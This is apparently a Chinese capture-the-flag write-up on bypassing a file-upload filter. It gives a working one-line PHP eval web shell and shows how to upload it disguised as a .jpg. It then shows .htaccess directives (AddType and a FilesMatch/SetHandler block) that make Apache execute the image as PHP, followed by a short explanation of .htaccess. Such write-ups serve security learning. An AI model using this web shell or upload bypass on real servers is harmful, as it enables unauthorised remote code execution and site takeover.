你传你m呢

开局让传马。随便写个一句话

<?php @eval($_POST['pass']);?>

直接传php会彦宏获水

1679370912579

bp里改Content-type也不行,必须给后缀变成jpg

1679370968144

上传成功后,再上传一个htaccess,内容为

AddType application/x-httpd-php .jpg

用bp把Content-type改成Image/jpeg

1679375197075

然后再传个马

1679375221369

即可连接

1679375258197

也可以用

<FilesMatch "4.jpg">  
        SetHandler application/x-httpd-php  
</FilesMatch>

来进行匹配地解析

总结

.htaccess

.htaccess是一个纯文本文件,它里面存放着Apache服务器配置相关的指令。
.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。

启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。

参考

https://www.cnblogs.com/engeng/articles/5948089.html